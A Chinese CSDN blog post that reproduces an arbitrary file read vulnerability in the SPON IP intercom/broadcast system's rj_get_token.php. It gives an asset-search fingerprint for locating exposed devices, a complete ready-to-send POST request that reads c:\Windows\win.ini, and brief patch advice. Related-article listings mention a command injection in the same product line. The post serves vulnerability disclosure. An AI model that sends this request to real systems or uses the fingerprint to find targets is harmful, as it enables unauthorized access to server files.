世邦通信SPON IP网络对讲广播系统rj_get_token.php 任意文件读取漏洞

最新推荐文章于 2024-08-29 20:58:07 发布
最新推荐文章于 2024-08-29 20:58:07 发布
阅读量2k 收藏 8
点赞数 8
分类专栏: 漏洞复现 文章标签: 网络 php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/135505570
版权

产品介绍

世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

spon IP网络对讲广播系统rj_get_token.php存在任意文件读取漏洞,攻击者可通过该漏洞在服务器端读取任意敏感文件。

资产测绘
icon_hash=“-1830859634”
在这里插入图片描述

漏洞复现

POST /php/rj_get_token.php HTTP/1.1
Host: your_ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

jsondata[url]=c:\Windows\win.ini

读取win.ini配置文件内容
在这里插入图片描述

修复建议

1、升级至最新安全版本。
2、限制接口访问。

keepb1ue
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
世邦IP配置工具.rar
01-15
IP
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 850
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
通信 SPON IP网络广播系统 addmediadata.php 任意文件上传漏洞
weixin_43167326的博客
06-25 271
世邦通信 SPON IP网络广播系统采用领先的IPAudio技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。
漏洞情报-世邦IP网络广播系统远程命令执行漏洞CVE-2023-6895
qq_52612931的博客
01-09 1146
海康威视IP网络广播系统3.0.3_20201113_RELEASE(HIK)中发现了漏洞。它被宣布为危急状态。此漏洞影响文件/php/ping. php的未知代码。使用输入netstat -ano操作参数jsondata[ip]会导致os命令注入。升级到4.1.0版本可以解决这个问题。建议升级受影响的组件。
php 微信 gettoken,PHP编程:微信 getAccessToken方法详解及实例
weixin_39631899的博客
04-02 207
PHP编程:微信 getAccessToken方法详解及实例》要点:本文介绍了PHP编程:微信 getAccessToken方法详解及实例,希望对您有用。如果有疑问,可以联系我们。memcache缓存存储用户信息7000秒PHP教程function getAccessToken($appid,$appsecret){$mem = new CacheMemcache();$acc = $mem-&...
IP网络(世邦)开发SDK文档Demo及dll&ocx;
11-20
IP网络技术详解——基于世邦SDK的开发实践》 在当今信息化社会中,IP网络系统因其高效、稳定和灵活的特点,被广泛应用于监控、安防、指挥调度等多个领域。本文将深入探讨IP网络的核心技术,并以世邦...
世邦IP网络广播系统演示.ppt
09-28
世邦IP网络广播系统】是由世邦通用数字技术有限公司研发的一款基于IP网络技术的公共广播系统,该公司作为大中华区领先的IP网络公共广播系统提供商,隶属于世邦电子集团,拥有分布在加拿大、中国大陆多个城市的分支...
IP网络公共广播内部通信系统开发文档及最新Demo(2018)
01-04
本文将深入解析基于IP网络的公共广播内部通信系统的开发,主要围绕“IP”这一核心技术,结合2018年的最新Demo——世邦IP系统进行探讨。 首先,我们要理解IP网络公共广播系统的基本概念。该系统是利用IP网络...
世邦IP网络公共广播交流培训.pptx
10-12
总之,世邦IP网络公共广播系统凭借其创新的技术、强大的功能和卓越的稳定性,为现代广播通信带来了新的标准,广泛应用于教育、商业和公共服务等多个领域,实现了高效、灵活且高质量的音频传播。
网络原理 - 初识
2302_77179144的博客
08-28 1044
计算机之间通过网络来传输数据,也称为网络通信。根据网络互连的规模不同,可以划分为局域网和⼴域网。所谓 “局域网” 和 “广域网” 只是⼀个相对的概念。
自治系统与局域网的区别
weixin_63566653的博客
08-28 512
局域网内的机器通常没有独立的IP地址,而是通过路由器进行DHCP和NAT来分配内部的IP地址,使得局域网内的设备能够通过一个公共IP地址访问外部网络。从定义上来看,自治系统和局域网的主要区别在于它们的范围和功能。此外,自治系统强调的是自主管理和路由选择的功能,而局域网则更注重于提供一个封闭的、地理上接近的设备互联环境。自治系统(AS)是一个有权自主地决定在本系统中应采用各种路由协议的小型单位,它是一个单独的可管理的网络单元,可以是一个简单的网络也可以是一个由一个或多个普通的网络管理员来控制的网络群体。
Linux高性能服务器编程 总结索引 | 第2章:IP协议详解
最新发布
AsherGu的博客
08-29 1093
IP服务的特点;IPv4头部结构;IP分片;IP路由:IP模块工作流程,路由机制,路由表更新;IP转发;重定向;IPv6头部结构:IPv6固定头部结构,IPv6扩展头部
如何将十六进制的乱码转换成汉字
2401_85258690的博客
08-28 1691
可以看出,接收到的报文第一行包含了我们想要的信息,我们需要将。在TCP通信时,抓包得到的请求报文,我们需要对其进行分析,中心思想为:剔除%,用strtol将16进制乱码进行转换。
33.python socket
笔生花的博客
08-27 2236
python socket 心跳包 数据包
在Linux中杀死占用某个端口的进程
靖妖傩舞
08-28 643
选项表示强制终止进程,但这种方式可能会导致数据丢失或其他不良后果,所以在使用时要谨慎。确定要杀死的进程 PID。从上述步骤中获取到占用端口 9997 的进程 PID。
SSH是什么?
思索的涟漪,突破自我
08-28 999
SSH的工作原理可以简单理解为,它在用户和服务器之间建立了一条“安全隧道”,通过这条隧道传输的数据都被加密,防止中间人攻击或数据泄露。公钥认证的原理是用户在本地生成一对密钥,其中公钥存放在服务器上,私钥则保存在本地。在现代互联网环境中,安全性越来越受到重视,SSH凭借其强大的加密能力和灵活的认证方式,成为了维护网络安全的重要工具之一。使用SSH时,用户只需要在终端或命令行界面输入简单的命令,就可以连接到远程服务器,执行各种操作,如文件传输、远程执行命令,甚至通过端口转发实现复杂的网络功能。
【CVPR‘24】BP-Net:用于深度补全的双边传播网络,新 SOTA!
梁瑛平的博客
08-28 725
深度补全任务旨在从稀疏的深度测量数据和同步的彩色图像中生成密集的深度图。现有的最先进方法多为基于传播的,通常作为对初始估计的密集深度的迭代改进。然而,这些初始深度估计通常直接将卷积层应用于稀疏深度图。在本文中,我们提出了一种双边传播网络(BP-Net),在最早阶段进行深度传播,以避免直接在稀疏数据上进行卷积。具体而言,我们的方法通过一个非线性模型从附近的深度测量中传播目标深度,该模型的系数由一个多层感知器生成,并基于辐射差异和空间距离进行调整。
SMB文件共享服务器
m0_64827698的博客
08-27 785
net share 共享名=共享文件地址 /grant:everyone ,read 创建共享⽂件(/grant 指定用户访问权限)net share 共享文件名 /delete 删除共享⽂件。⼀种使⽤服务器消息块协议(SMB)来提供⽹络上的⽂件共享服务的服务器。,然后具体的权限需求在NTFS权限中设置即可。过各⾃的远程桌⾯会话登录,这些登录也。将受共享及NTFS权限的共同影响,查看 本地⽹络连接状态。
无线通信-WIFI通信
L的博客
08-28 1301
内容涉及WIFI通信。包含基础知识、工作模式、AT指令、常用AT指令实例、连接原子云、使用usb转ttl模块测试ATK-MW8266D、使用STM32F103ZET6战舰开发板透传模式、使用STM32F103ZET6战舰板连接原子云等知识。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值